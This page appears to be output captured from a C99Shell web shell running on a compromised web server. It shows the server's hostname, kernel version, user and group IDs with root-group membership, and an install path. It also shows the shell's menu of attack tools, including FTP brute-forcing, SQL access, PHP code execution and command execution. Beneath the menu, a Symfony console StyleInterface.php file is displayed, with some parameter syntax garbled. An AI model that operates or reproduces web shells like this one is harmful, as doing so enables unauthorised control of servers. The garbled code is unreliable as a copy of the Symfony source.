!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/portfolio.picotech.app/public_html/vendor/symfony/console/Style/   drwxr-xr-x
Free 28.75 GB of 117.98 GB (24.37%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     StyleInterface.php (2.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\Console\Style;

/**
 * Output style helpers.
 *
 * @author Kevin Bond <kevinbond@gmail.com>
 */
interface StyleInterface
{
    
/**
     * Formats a command title.
     *
     * @return void
     */
    
public function title(string $message);

    
/**
     * Formats a section title.
     *
     * @return void
     */
    
public function section(string $message);

    
/**
     * Formats a list.
     *
     * @return void
     */
    
public function listing(array $elements);

    
/**
     * Formats informational text.
     *
     * @return void
     */
    
public function text(string|array $message);

    
/**
     * Formats a success result bar.
     *
     * @return void
     */
    
public function success(string|array $message);

    
/**
     * Formats an error result bar.
     *
     * @return void
     */
    
public function error(string|array $message);

    
/**
     * Formats an warning result bar.
     *
     * @return void
     */
    
public function warning(string|array $message);

    
/**
     * Formats a note admonition.
     *
     * @return void
     */
    
public function note(string|array $message);

    
/**
     * Formats a caution admonition.
     *
     * @return void
     */
    
public function caution(string|array $message);

    
/**
     * Formats a table.
     *
     * @return void
     */
    
public function table(array $headers, array $rows);

    
/**
     * Asks a question.
     */
    
public function ask(string $question, ?string $default null, ?callable $validator null): mixed;

    
/**
     * Asks a question with the user input hidden.
     */
    
public function askHidden(string $question, ?callable $validator null): mixed;

    
/**
     * Asks for confirmation.
     */
    
public function confirm(string $questionbool $default true): bool;

    
/**
     * Asks a choice question.
     */
    
public function choice(string $question, array $choicesmixed $default null): mixed;

    
/**
     * Add newline(s).
     *
     * @return void
     */
    
public function newLine(int $count 1);

    
/**
     * Starts the progress output.
     *
     * @return void
     */
    
public function progressStart(int $max 0);

    
/**
     * Advances the progress output X steps.
     *
     * @return void
     */
    
public function progressAdvance(int $step 1);

    
/**
     * Finishes the progress output.
     *
     * @return void
     */
    
public function progressFinish();
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0047 ]--